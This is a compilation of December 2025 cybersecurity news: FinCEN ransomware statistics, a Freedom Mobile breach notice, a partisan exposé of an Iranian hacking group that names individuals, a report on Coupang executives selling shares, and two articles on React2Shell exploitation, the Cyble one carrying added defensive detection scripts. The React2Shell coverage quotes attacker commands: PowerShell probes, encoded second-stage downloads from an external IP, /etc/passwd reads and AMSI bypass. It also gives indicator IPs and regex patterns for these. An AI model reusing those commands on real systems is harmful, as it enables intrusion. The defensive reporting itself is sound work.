FinCEN.gov
December 04, 2025
WASHINGTON—Today, the U.S. Department of the Treasury’s Financial Crimes Enforcement Network (FinCEN) is issuing a Financial Trend Analysis on ransomware incidents in Bank Secrecy Act (BSA) data between 2022 and 2024, which totaled more than $2.1 billion in ransomware payments.
“Banks and other financial institutions play a key role in protecting our economy from ransomware and other cyber threats,” said FinCEN Director Andrea Gacki. “By quickly reporting suspicious activity under the Bank Secrecy Act, they provide law enforcement with critical information to help detect cybersecurity trends that can damage our economy. This work is vital to safeguarding our nation’s financial sector and strengthening our national security.”
Previous FinCEN Financial Trend Analyses have focused on reported ransomware payments and incidents by the date the activity was filed with FinCEN. Today’s report shifts the focus to the incident date of each ransomware attack and offers greater visibility into the activities conducted by ransomware actors.
Reported Ransomware Incidents and Payments Reach All-Time High in 2023
Ransomware incidents and payments reported to FinCEN reached their highest level in 2023 with 1,512 incidents, totaling $1.1 billion in payments—an increase of 77 percent in total payments year-over-year from 2022 to 2023.
Following law enforcement’s disruption of two high-profile ransomware groups, ransomware incidents reported to FinCEN decreased in 2024, with 1,476 incidents, reflecting $734 million in the aggregate value of reported payments in BSA reports.
The median amount of a single ransomware transaction was $124,097 in 2022; $175,000 in 2023; and $155,257 in 2024. Between 2022 and 2024, the most common payment amount range was below $250,000.
FinCEN Data Shows Ransomware Payments Top $2.1B in Just Three Years
During the three-year review period (January 2022 – December 2024), FinCEN received 7,395 BSA reports related to 4,194 ransomware incidents totaling more than $2.1 billion in ransomware payments.
During the previous nine-year period (2013 through the end of 2021) FinCEN received 3,075 BSA reports totaling approximately $2.4 billion in ransomware payments.
Financial Services, Manufacturing, and Healthcare were the Most Impacted Industries
The manufacturing industry accounted for 456 incidents totaling approximately $284.6 million in reported payments; the financial services industry accounted for 432 incidents totaling approximately $365.6 million in reported payments; and the healthcare industry accounted for 389 incidents totaling approximately $305.4 million in reported payments.
The Onion Router (TOR) was the Most Common Communication Method Reported
Threat actors most often communicated with their intended ransomware targets via messages sent over The Onion Router protocol, accounting for 67 percent of reports that provided the communication method.
Other ransomware threat actors communicated with their intended targets via email or through other private encrypted messaging systems.
ALPHV/BlackCat was the Most Prevalent Ransomware Variant Between 2022 and 2024
FinCEN identified more than 200 ransomware variants reported in BSA data.
The most reported variants were Akira, ALPHV/BlackCat, LockBit, Phobos, and Black Basta.
The 10 variants with the highest cumulative payment amounts identified in BSA reports accounted for approximately $1.5 billion in payments.
Ransomware is a complex cybersecurity problem requiring a variety of preventive, protective, and preparatory best practices. More information on FinCEN’s efforts to combat ransomware, including guidance and other resources for financial institutions, is available at www.fincen.gov/resources/fincen-combats-ransomware.
FinCEN’s FTA is available online as “Ransomware Trends in Bank Secrecy Act Data.”
Questions or comments regarding the contents of this release should be addressed to the FinCEN Regulatory Support Section by submitting an inquiry at www.fincen.gov/contact.
FinCEN periodically publishes Financial Trend Analyses describing threat pattern and trend information derived from Bank Secrecy Act (BSA) filings to highlight priority illicit finance risks. These analyses provide information that is relevant to a wide range of consumers, businesses, and industries; communicate the value of BSA reporting; and enhance feedback loops between government users of BSA reports and their filers. Additionally, Financial Trend Analyses fulfill FinCEN’s obligations pursuant to section 6206 of the Anti-Money Laundering Act of 2020, which requires FinCEN to periodically publish threat pattern and trend information derived from BSA filings.
Freedom Mobile
December 3, 2025
At Freedom Mobile, we take the protection of personal information very seriously. We want to inform you about a recent privacy incident that requires your attention.
On October 23, we detected unauthorized activity on our customer account management platform. Our investigation revealed that a third party used the account of a subcontractor to gain access to the personal information of a limited number of our customers. We quickly identified the incident and implemented corrective measures and security enhancements, including blocking the suspicious accounts and corresponding IP addresses.
While our teams continue to closely monitor the situation to prevent any further unauthorized access, we wanted to inform you of the incident so that you can take precautionary measures.
What personal information was accessed?
First and last name
Home address
Date of birth
Phone number (home and/or cell)
Freedom Mobile account number
Rest assured that this incident did not affect your payment information or passwords.
Although we have no reason to believe that this information was misused, we encourage you to follow best practices to protect your data:
Protect your personal information: Be cautious of any unexpected messages asking for personal information or directing you to a website to enter it. Freedom Mobile will never ask you for personal information such as credit card numbers, banking information, passwords, or PIN codes by email or SMS.
Stay alert with messages: Avoid clicking on links or downloading attachments from emails or texts that seem suspicious.
Monitor your accounts: Regularly check your accounts for unusual or suspicious activity.
To learn more about different types of fraud and how to protect yourself, visit the Canadian Anti-Fraud Centre website at https://antifraudcentre-centreantifraude.ca.
We’re sorry this happened and understand it may cause concern. If you have any questions, please contact us at privacyofficer@freedommobile.ca
Thank you for your attention.
The cyber group "Banished Kitten," operating under the alias "Handala" and affiliated with the Ministry of Intelligence and Security of Iran (MOIS), has once again exposed its own clumsy operations. This time, the group inadvertently revealed confidential access to Suvarnabhumi Airport (BKK) in Bangkok, Thailand, while attempting to claim they had compromised Israeli airport security. As previously reported, "Handala" operates under MOIS's Counter-Terrorism (CT) division, led by Seyed Yahya Hosseini Panjaki (alias "Seyed Yahya Hamidi"), Deputy of Internal Security at MOIS. Hosseini's reckless actions continue to endanger Iran's national interests, further exposing the group's incompetence.
The Blunder
On November 15, 2025, "Handala" published a propaganda piece titled "Smile for the Camera – Handala Is Watching," boasting about access to "Shabak's airport security systems" (Israel's domestic security agency). The post threatened: "Our presence defies your imagination. Handala is not just a name; it's a shadow, a watchful gaze in places you never expect, even at the exit cameras of your airport gates."
There's just one problem: the images aren't from Israel. A simple comparison of the published airport surveillance images with publicly available references clearly identifies the location as Suvarnabhumi Airport (BKK) in Bangkok, Thailand, not Ben Gurion Airport. The evidence is clear: the distinctive exposed steel beam ceiling structure, the immigration hall layout with its recognizable queue barriers, and the terminal's characteristic architecture all unmistakably match Bangkok's main international hub. The images show travelers in the passport control area with Suvarnabhumi's signature industrial ceiling design and escalators visible in the background. Once again, the CT Division's amateur operatives have failed basic operational security. This marks the first time the group has publicly disclosed accessing critical infrastructure outside Israel.
Suvarnabhumi Airport is no small target. According to official statistics, BKK handled 62,234,693 passengers in 2024, making it the busiest airport in Thailand, the 9th busiest airport in Asia, and ranking among the top 25 busiest airports worldwide. The airport serves as a major transit hub connecting Asia, Europe, and the Middle East, with traffic increasing 20% compared to the previous year. Since the airport's third runway opened in November 2024, capacity has expanded to 94 flights per hour, and Suvarnabhumi is investing heavily in becoming a world-class hub.
What makes this breach particularly concerning is the sophistication of the systems potentially compromised. Suvarnabhumi Airport operates AI-powered facial recognition technology, license plate tracking, and integrated CCTV systems across the facility. The airport's Thailand Immigration System (TIS) maintains both "black lists" and "watch lists" with detection capabilities within 20 seconds of passport scanning. If MOIS has access to these systems, they could potentially monitor travelers, track movements, and identify targets passing through one of Asia's busiest transit points.
Warning to Iranians
Dear Iranians: even in Thailand, a popular destination and transit point for Iranian citizens traveling abroad, the oppressive regime is watching you. The Islamic Republic's intelligence apparatus has extended its surveillance to monitor Iranians traveling through Bangkok. Whether for business, tourism, or seeking freedom abroad, your movements may be tracked by Seyed Yahya's amateur operatives. With over 62 million passengers transiting through BKK annually, the potential for surveillance and targeting of Iranian dissidents, activists, and ordinary citizens is significant. It should be noted that Thailand is among the limited countries that Iranian citizens can travel to without needing a visa.
It's no surprise that "Handala" continues to make operational security mistakes. As recently exposed by Iran International, Ali Bermoudeh, a 27-year-old amateur hacker from Tabriz whose passwords for key accounts are simply his birthdate, works for this reckless group. His handler at MOIS is Morteza Aftabifar. When your cyber operators can't distinguish between Tel Aviv and Bangkok, and secure their accounts with passwords like "1377629", perhaps it's time for Seyed Yahya to reconsider his recruitment standards.
Thai authorities should be aware: the Islamic Republic's Ministry of Intelligence has compromised security systems at Suvarnabhumi Airport. This is not speculation. MOIS's own cyber group published the evidence themselves. A breach of this magnitude by a state-sponsored threat actor, one designated as a terrorist organization by the European Union, demands immediate investigation and response. But hey, at least they got the continent right this time. The real question is: what will Thailand do about it?
chosun.com
Coupang Executives Sell Shares After Data Breach
Coupang executives sold shares post-breach; President Lee Jae-myung seeks responsibility
Amid growing calls for accountability against Kim Bom-suk, 47, chairman of Coupang Inc., over the data breach affecting 33.7 million individuals, it has been confirmed that key Coupang executives sold billions of won worth of company stock. The timing of these sales—immediately after the incident—is expected to spark significant controversy.
According to a U.S. Securities and Exchange Commission (SEC) filing on the 2nd (local time), Gaurav Anand, Coupang’s chief financial officer (CFO), reported selling 75,350 Coupang Inc. shares at approximately $29 per share on the 10th of last month. The sale amounted to around $2.186 million (approximately 3.2 billion Korean won). Additionally, former Vice President Pranam Kolari sold 27,388 Coupang shares on the 17th of last month, with the transaction valued at $772,000 (approximately 1.13 billion Korean won). Kolari, who oversaw search and recommendation technologies, resigned on the 14th of last month. However, the SEC confirmed he had notified the company of his resignation on October 15th, prior to the incident.
According to a breach incident report submitted to the Korea Internet & Security Agency (KISA) and obtained by the office of Science, ICT, Broadcasting, and Communications Committee Chairman Representative Choi Min-hee, Coupang reported unauthorized access to its account information at 6:38 p.m. on the 6th of last month. This predates the executives’ stock sales. However, the company recorded the time of awareness as 10:52 p.m. on the 18th of last month. While the sales occurred before the company publicly acknowledged the breach, the transactions took place after the incident itself, making controversy inevitable.
Domestically, criticism has emerged holding Chairman Kim ultimately responsible for the incident. President Lee Jae-myung also stated during a Cabinet meeting on the 2nd, “Coupang has caused significant public concern. The cause of the accident must be identified swiftly, and responsibility must be held strictly,” while instructing measures such as strengthening penalties and implementing a punitive damages system.
cyble.com
December 8, 2025
China-nexus groups rapidly exploited React2Shell (CVE-2025-55182). Learn how the React Server Components flaw was weaponized within minutes of disclosure.
React2Shell (CVE-2025-55182) was exploited within minutes by China-nexus groups, exposing critical weaknesses in React Server Components.
The vulnerability disclosure cycle has entered a new era, one where the gap between publication and weaponization is measured in minutes, not days. It has been confirmed that China-nexus threat actors began actively exploiting a critical React Server Components flaw, React2Shell, only hours after its public release.
The vulnerability, tracked as CVE-2025-55182, impacts React Server Components across React 19.x and Next.js 15.x/16.x deployments using the App Router and carries a CVSS 10.0 severity rating, enabling unauthenticated remote code execution (RCE).
CISA immediately added the flaw to its Known Exploited Vulnerabilities catalog, stating:
“CISA has added one new vulnerability to its Known Exploited Vulnerabilities (KEV) Catalog, based on evidence of active exploitation.”
The Researcher’s PoCs and the Mechanism of Exploitation
Lachlan Davidson, who has been attributed with finding this flaw, published the original PoCs on GitHub, explaining:
“As public PoCs are circulating and Google’s Scanner uses a variation of my original submitted PoC, it’s finally a responsible time to share my original PoCs for React2Shell.”
Davidson released three PoCs, 00-very-first-rce-poc, 01-submitted-poc.js, and 02-meow-rce-poc, and summarized the attack chain:
“$@x gives you access to a Chunk”
“We plant its then on our own object”
“The JS runtime automatically unravels nested promises”
“We now re-enter the parser, but with control of a malicious fake Chunk object”
“Planting things on _response lets us access a lot of gadgets”
“RCE”
He also noted that “the publicly recreated PoC… did otherwise use the same _formData gadget that mine did”, though the chaining primitive in his implementation (planting a “then” on a controlled object) was not universally adopted.
Rapid Weaponization by China-Nexus Groups
AWS detected exploitation beginning within hours of public disclosure on December 3, based on telemetry from its MadPot honeypot infrastructure. The actors included:
Earth Lamia, known for targeting financial, logistics, and government sectors across Latin America, MENA, and Southeast Asia.
Jackpot Panda, primarily focused on East and Southeast Asian organizations aligned with domestic security interests.
AWS stated, “China continues to be the most prolific source of state-sponsored cyber threat activity, with threat actors routinely operationalizing public exploits within hours or days of disclosure.”
Attackers overwhelmingly prioritized speed over precision, firing flawed and incomplete public PoCs at large swaths of the internet in a high-volume scanning wave. Many PoCs made unrealistic assumptions, such as assuming exposed fs, vm, or child_process modules that never appear in real deployments.
Yet this volume-based strategy still identifies edge-case vulnerable configurations.
Technical Analysis: React2Shell in the RSC Flight Protocol
CRIL (Cyble Research and Intelligence Labs) found that at its core, CVE-2025-55182 (React2Shell) is an unsafe deserialization flaw in the React Server Components Flight protocol. It affects:
react-server-dom-webpack
react-server-dom-parcel
react-server-dom-turbopack
Across React versions 19.0.0–19.2.0, patched in 19.0.1, 19.1.2, and 19.2.1.
Next.js is additionally vulnerable under CVE-2025-66478, impacting all versions from 14.3.0-canary.77, all unpatched 15.x builds, and all 16.x releases before 16.0.7.
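The version ranges above are the first thing a defender checks. The following script is an added example (not code from the Cyble article, React, or Next.js) that walks a flat dependency map and classifies each react-server-dom-* and next entry against the ranges the article gives; because no fixed 15.x number is stated, 15.x is flagged for manual review rather than guessed. The dependency map is constructed for the example.

```javascript
// Added example (not from the Cyble article, React, or Next.js): checks a
// dependency map against the vulnerable ranges the article lists for
// CVE-2025-55182 (react-server-dom-*) and CVE-2025-66478 (next).

const RSC_PACKAGES = new Set([
  "react-server-dom-webpack",
  "react-server-dom-parcel",
  "react-server-dom-turbopack",
]);

// React 19 minor lines and the first fixed patch level in each (19.0.1, 19.1.2, 19.2.1).
const REACT_FIXED_PATCH = { 0: 1, 1: 2, 2: 1 };

// Parse "MAJOR.MINOR.PATCH[-PRERELEASE]"; anything else is rejected rather than guessed.
function parseVersion(v) {
  const m = /^(\d+)\.(\d+)\.(\d+)(?:-([0-9A-Za-z.-]+))?$/.exec(v.trim());
  if (!m) throw new Error(`unparseable version: ${v}`);
  return { major: +m[1], minor: +m[2], patch: +m[3], pre: m[4] || null };
}

// Vulnerable range from the article: 19.0.0 through 19.2.0, minus the fixed releases.
function assessReactServerDom(version) {
  const { major, minor, patch } = parseVersion(version);
  if (major !== 19 || !(minor in REACT_FIXED_PATCH)) return "not-in-listed-range";
  return patch < REACT_FIXED_PATCH[minor] ? "vulnerable" : "patched";
}

// Next.js per the article: 14.3.0-canary.77 onward, all unpatched 15.x, and
// 16.x before 16.0.7. No fixed 15.x number is given, so 15.x is returned for
// manual review instead of inventing one. 16.1+ is treated as after the fix.
function assessNext(version) {
  const { major, minor, patch, pre } = parseVersion(version);
  if (major === 16) return minor === 0 && patch < 7 ? "vulnerable" : "patched";
  if (major === 15) return "review-15x";
  if (major === 14 && minor === 3 && patch === 0 && pre) {
    const c = /^canary\.(\d+)$/.exec(pre);
    if (c && +c[1] >= 77) return "vulnerable";
  }
  return "not-in-listed-range";
}

// deps is a flat {name: version} map, e.g. flattened from package-lock.json.
function scanDependencies(deps) {
  const findings = [];
  for (const [name, version] of Object.entries(deps)) {
    if (RSC_PACKAGES.has(name)) {
      findings.push({ name, version, cve: "CVE-2025-55182", status: assessReactServerDom(version) });
    } else if (name === "next") {
      findings.push({ name, version, cve: "CVE-2025-66478", status: assessNext(version) });
    }
  }
  return findings;
}

// Constructed sample (not a real project's lockfile).
const SAMPLE_DEPS = {
  react: "19.1.1",
  "react-server-dom-webpack": "19.1.1",
  next: "16.0.3",
  express: "4.19.2",
};

for (const f of scanDependencies(SAMPLE_DEPS)) {
  console.log(`${f.name}@${f.version}: ${f.status} (${f.cve})`);
}
```

Because the fix requires a rebuild and redeploy, checking the lockfile alone is not proof that the running artifact is patched.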
Attack telemetry showed:
Automated scanners with user-agent randomization
Parallel exploitation of CVE-2025-1338
Immediate PoC adoption regardless of accuracy
Manual exploitation attempts, including whoami, id, and /etc/passwd reads
File write attempts such as /tmp/pwned.txt
A concentrated cluster originating from 183[.]6.80.214 executed 116 requests over 52 minutes, demonstrating active operator involvement.
Cloudflare’s Emergency Downtime While Mitigating React2Shell
The severity of React2Shell (CVE-2025-55182) was spotlighted when Cloudflare intentionally took down part of its own network to apply emergency defenses. The outage affected 28% of Cloudflare-served HTTP traffic early Friday.
Cloudflare CTO Dane Knecht clarified that the disruption “was not caused, directly or indirectly, by a cyberattack… Instead, it was triggered by changes being made to our body parsing logic while attempting to detect and mitigate an industry-wide vulnerability disclosed this week in React Server Components.”
This incident unfolded as researchers observed attackers hammering the vulnerability, alongside waves of legitimate and fraudulent proofs of concept circulating online.
Global Warnings Ring-In
The Australian Cyber Security Centre (ACSC) issued a public notice, stating, “This alert is relevant to all Australian businesses and organizations… ASD’s ACSC is aware of a critical vulnerability in React Server Components… Organizations should review their networks for vulnerable instances of these packages and upgrade to fixed versions.”
Organizations must assume that scanning for React2Shell is continuous and widespread. ACSC outlined some immediate steps for mitigation:
Update all React/Next.js deployments: Verify versions against vulnerable ranges and upgrade to patched releases.
Enable AWS WAF interim protection rules: These block known exploit sequences during patching windows.
Review logs for exploitation indicators: Look for malformed RSC payloads, next-action or rsc-actionid headers, and repeated sequential failures.
Inspect backend systems for post-exploitation behavior: Unexpected execution, unauthorized file writes, or suspicious commands.
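The log-review step above is concrete enough to automate. The following script is an added example (not code from the Cyble article, ACSC, or AWS) that runs over constructed JSON-lines access-log records and reports, per source IP, which of the article's indicators fired: next-action or rsc-action-id headers with repeated sequential failures, user-agent rotation, reconnaissance strings (whoami, id, /etc/passwd, /tmp/pwned.txt), and request bursts like the 116-requests-in-52-minutes cluster. The thresholds and the log format are assumptions.

```javascript
// Added example (not from the Cyble article or any vendor product): applies
// the "review logs for exploitation indicators" step to constructed
// access-log records and reports, per source IP, which indicators fired.

// Constructed JSON-lines access log (not real traffic). Header names are kept
// as the server recorded them; matching below is case-insensitive.
const SAMPLE_LOG = [
  '{"ts":"2025-12-04T01:00:05Z","src":"198.51.100.7","method":"POST","path":"/","status":500,"ua":"Mozilla/5.0 (X11; Linux x86_64)","hdrs":{"Next-Action":"0a1b2c"},"body":"[malformed chunk]"}',
  '{"ts":"2025-12-04T01:00:09Z","src":"198.51.100.7","method":"POST","path":"/","status":500,"ua":"curl/8.4.0","hdrs":{"next-action":"0a1b2c"},"body":"[malformed chunk]"}',
  '{"ts":"2025-12-04T01:00:14Z","src":"198.51.100.7","method":"POST","path":"/","status":500,"ua":"python-requests/2.31","hdrs":{"rsc-action-id":"0a1b2c"},"body":"[malformed chunk]"}',
  '{"ts":"2025-12-04T01:00:21Z","src":"198.51.100.7","method":"POST","path":"/","status":200,"ua":"curl/8.4.0","hdrs":{"next-action":"0a1b2c"},"body":"... whoami; cat /etc/passwd ..."}',
  '{"ts":"2025-12-04T01:00:30Z","src":"203.0.113.9","method":"GET","path":"/products","status":200,"ua":"Mozilla/5.0 (Windows NT 10.0)","hdrs":{},"body":""}',
  '{"ts":"2025-12-04T01:00:31Z","src":"203.0.113.9","method":"POST","path":"/","status":200,"ua":"Mozilla/5.0 (Windows NT 10.0)","hdrs":{"next-action":"7f3e"},"body":"[]"}',
];

// Thresholds are assumptions for this example; tune them to your traffic.
const THRESHOLDS = { consecutiveFailures: 3, distinctUserAgents: 3, burstRequests: 10, burstWindowMin: 60 };

// The two request headers the article says to look for.
const ACTION_HEADERS = new Set(["next-action", "rsc-action-id"]);
function hasActionHeader(hdrs) {
  return Object.keys(hdrs || {}).some((k) => ACTION_HEADERS.has(k.toLowerCase()));
}

// Reconnaissance strings the article reports in exploitation attempts.
const POST_EXPLOIT_RE = /\bwhoami\b|\/etc\/passwd|\/tmp\/pwned\.txt|(^|[\s;|&])id(?=$|[\s;|&])/;

// Largest number of timestamps (ms) that fall inside any span of windowMs.
function maxInWindow(times, windowMs) {
  const t = [...times].sort((a, b) => a - b);
  let best = 0, lo = 0;
  for (let hi = 0; hi < t.length; hi++) {
    while (t[hi] - t[lo] > windowMs) lo++;
    best = Math.max(best, hi - lo + 1);
  }
  return best;
}

// Returns {srcIp: [indicator, ...]} for every source IP seen in the log.
function analyzeLog(lines) {
  const perIp = new Map();
  for (const line of lines) {
    const r = JSON.parse(line);
    let s = perIp.get(r.src);
    if (!s) { s = { run: 0, maxRun: 0, uas: new Set(), postExploit: 0, times: [] }; perIp.set(r.src, s); }
    s.uas.add(r.ua);
    s.times.push(Date.parse(r.ts));
    if (POST_EXPLOIT_RE.test(r.body || "")) s.postExploit++;
    // Only server-action requests count toward the failure run: a 4xx/5xx on an
    // ordinary page fetch says nothing about RSC payload handling.
    if (hasActionHeader(r.hdrs)) {
      s.run = r.status >= 400 ? s.run + 1 : 0;
      s.maxRun = Math.max(s.maxRun, s.run);
    }
  }
  const findings = {};
  for (const [ip, s] of perIp) {
    const reasons = [];
    if (s.maxRun >= THRESHOLDS.consecutiveFailures) reasons.push("consecutive-action-failures");
    if (s.uas.size >= THRESHOLDS.distinctUserAgents) reasons.push("user-agent-rotation");
    if (s.postExploit > 0) reasons.push("post-exploitation-strings");
    if (maxInWindow(s.times, THRESHOLDS.burstWindowMin * 60000) >= THRESHOLDS.burstRequests) reasons.push("request-burst");
    findings[ip] = reasons;
  }
  return findings;
}

console.log(analyzeLog(SAMPLE_LOG));
```

Request bodies are only available if the server or proxy logs them; without body logging, the header, failure-run and burst indicators still work on ordinary access logs.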
Conclusion
The exploitation of React2Shell (CVE-2025-55182) shows how quickly high-severity vulnerabilities in critical and widely adopted components can be weaponized. China-nexus groups and opportunistic actors began targeting the flaw within minutes of disclosure, using shared infrastructure and public PoCs, accurate or not, to launch high-volume attacks. Organizations using React or Next.js App Router must patch immediately and monitor for iterative, operator-driven activity.
Given this tempo, organizations need intelligence and automation that operate in real time. Cyble, ranked #1 globally in Cyber Threat Intelligence Technologies by Gartner Peer Insights, provides AI-native security capabilities through platforms such as Cyble Vision and Blaze AI. These systems identify threats early, correlate IOCs across environments, and automate response actions.
Indicators of Compromise
206[.]237.3.150
45[.]77.33.136
143[.]198.92.82
183[.]6.80.214
MITRE ATT&CK Techniques
Tactic | Technique ID | Technique Name
Initial Access | T1190 | Exploit Public-Facing Application
Privilege Escalation | T1068 | Exploitation for Privilege Escalation
bleepingcomputer.com
By Lawrence Abrams
December 6, 2025
Over 77,000 Internet-exposed IP addresses are vulnerable to the critical React2Shell remote code execution flaw (CVE-2025-55182), with researchers now confirming that attackers have already compromised over 30 organizations across multiple sectors.
React2Shell is an unauthenticated remote code execution vulnerability that can be exploited via a single HTTP request and affects all frameworks that implement React Server Components, including Next.js, which uses the same deserialization logic.
React disclosed the vulnerability on December 3, explaining that unsafe deserialization of client-controlled data inside React Server Components enables attackers to trigger remote, unauthenticated execution of arbitrary commands.
Developers are required to update React to the latest version, rebuild their applications, and then redeploy to fix the vulnerability.
On December 4, security researcher Maple3142 published a working proof-of-concept demonstrating remote command execution against unpatched servers. Soon after, scanning for the flaw accelerated as attackers and researchers began using the public exploit with automated tools.
Over 77,000 vulnerable IP addresses
Shadowserver Internet watchdog group now reports that it has detected 77,664 IP addresses vulnerable to the React2Shell flaw, with approximately 23,700 in the United States.
The researchers determined that IP addresses were vulnerable using a detection technique developed by Searchlight Cyber/Assetnote, where an HTTP request was sent to servers to exploit the flaw, and a specific response was checked to confirm whether a device was vulnerable.
GreyNoise also recorded 181 distinct IP addresses attempting to exploit the flaw over the past 24 hours, with most of the traffic appearing automated. The researchers say the scans are primarily originating from the Netherlands, China, the United States, Hong Kong, and a small number of other countries.
Palo Alto Networks reports that more than 30 organizations have already been compromised through the React2Shell flaw, with attackers exploiting the vulnerability to run commands, conduct reconnaissance, and attempt to steal AWS configuration and credential files.
These compromises include intrusions linked to known state-associated Chinese threat actors.
Widespread exploitation of React2Shell
Since its disclosure, researchers and threat intelligence companies have observed widespread exploitation of the CVE-2025-55182 flaw.
GreyNoise reports that attackers frequently begin with PowerShell commands that perform a basic math function to confirm the device is vulnerable to the remote code execution flaw.
These tests return predictable results while leaving minimal signs of exploitation:
powershell -c "4013841979"
powershell -c "4032043488"
Once remote code execution was confirmed, attackers were seen executing base64-encoded PowerShell commands that download additional scripts directly into memory.
powershell -enc <base64>
One observed command executes a second-stage PowerShell script from the external site (23[.]235[.]188[.]3), which is used to disable AMSI to bypass endpoint security and deploy additional payloads.
According to VirusTotal, the PowerShell script observed by GreyNoise installs a Cobalt Strike beacon on the targeted device, giving threat actors a foothold on the network.
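The sequence above (a numeric PowerShell probe, then an encoded command that fetches a second stage) is visible in endpoint process-creation telemetry rather than web logs. The following script is an added example (not code from BleepingComputer or GreyNoise) that classifies constructed process-creation events; it assumes the React Server Components application runs as a node process, so a shell spawned by node is treated as the high-signal event, and the encoded command in the sample is a plain web request constructed for the example, not a real payload.

```javascript
// Added example (not from the BleepingComputer article or GreyNoise):
// classifies constructed process-creation events for the PowerShell
// patterns the article describes after a React2Shell compromise.

// Constructed sample events (not real telemetry). The encoded command is built
// here so the sample stays readable; it is a harmless web request.
const ENCODED = Buffer.from("Invoke-WebRequest -Uri http://198.51.100.7/stage2.ps1", "utf16le").toString("base64");
const SAMPLE_EVENTS = [
  { parent: "node", image: "powershell.exe", cmdline: 'powershell -c "4013841979"' },
  { parent: "node", image: "powershell.exe", cmdline: `powershell -enc ${ENCODED}` },
  { parent: "explorer.exe", image: "powershell.exe", cmdline: "powershell -File C:\\scripts\\backup.ps1" },
  { parent: "node", image: "node.exe", cmdline: "node server.js" },
];

const SHELLS = new Set(["powershell.exe", "pwsh.exe", "cmd.exe", "sh", "bash"]);
// Assumption: the RSC app runs under node, so node spawning a shell is the key event.
const WEB_SERVER_PARENTS = new Set(["node", "node.exe", "next-server"]);
// The article's probe: powershell -c with nothing but a long numeric literal.
const NUMERIC_PROBE_RE = /powershell(?:\.exe)?\s+-c(?:ommand)?\s+"?\d{6,}"?\s*$/i;
// -e / -enc / -EncodedCommand followed by a base64 blob.
const ENCODED_RE = /-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})/i;

// PowerShell's -EncodedCommand takes base64 of a UTF-16LE string.
function decodeEncodedCommand(cmdline) {
  const m = ENCODED_RE.exec(cmdline);
  return m ? Buffer.from(m[1], "base64").toString("utf16le") : null;
}

// Returns the list of indicators that fired for one event.
function classify(evt) {
  const reasons = [];
  if (WEB_SERVER_PARENTS.has(evt.parent) && SHELLS.has(evt.image)) reasons.push("web-server-spawned-shell");
  if (NUMERIC_PROBE_RE.test(evt.cmdline)) reasons.push("numeric-rce-probe");
  const decoded = decodeEncodedCommand(evt.cmdline);
  if (decoded !== null) {
    reasons.push("encoded-command");
    // Keywords the article associates with the second stage: remote fetch, AMSI tampering.
    if (/https?:\/\/|Invoke-WebRequest|DownloadString|amsi/i.test(decoded)) reasons.push("remote-stage-fetch");
  }
  return reasons;
}

for (const evt of SAMPLE_EVENTS) {
  console.log(`${evt.parent} -> ${evt.image}: ${classify(evt).join(", ") || "no indicators"}`);
}
```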
Amazon AWS threat intelligence teams also saw rapid exploitation hours after the disclosure of the React CVE-2025-55182 flaw, with infrastructure associated with China-linked APT hacking groups known as Earth Lamia and Jackpot Panda.
In this exploitation, the threat actors perform reconnaissance on vulnerable servers by using commands such as whoami and id, attempting to write files, and reading /etc/passwd.
Palo Alto Networks also observed similar exploitation, attributing some of it to UNC5174, a Chinese state-sponsored threat actor believed to be tied to the Chinese Ministry of State Security.
"Unit 42 observed threat activity we assess with high confidence is consistent with CL-STA-1015 (aka UNC5174), a group suspected to be an initial access broker with ties to the Chinese Ministry of State Security," Justin Moore, Senior Manager at Palo Alto Networks Unit 42, told BleepingComputer via email.
"In this activity, we observed the deployment of Snowlight and Vshell malware, both highly consistent with Unit 42 knowledge of CL-STA-1015 (also known as UNC5174)."
The deployed malware in these attacks is:
Snowlight: A malware dropper that allows remote attackers to drop additional payloads on breached devices.
Vshell: A backdoor commonly used by Chinese hacking groups for remote access, post-exploitation activity, and to move laterally through a compromised network.
The rush to patch
Due to the severity of the React flaw, companies worldwide have rushed to install the patch and apply mitigations.
Yesterday, Cloudflare rolled out emergency detections and mitigations for the React flaw in its Web Application Firewall (WAF) due to its widespread exploitation and severity.
However, the update inadvertently caused an outage affecting numerous websites before the rules were corrected.
CISA has also added CVE-2025-55182 to the Known Exploited Vulnerabilities (KEV) catalog, requiring federal agencies to apply patches by December 26, 2025, under Binding Operational Directive 22-01.
Organizations using React Server Components or frameworks built on top of them are advised to apply updates immediately, rebuild and redeploy their applications, and review logs for signs of PowerShell or shell command execution.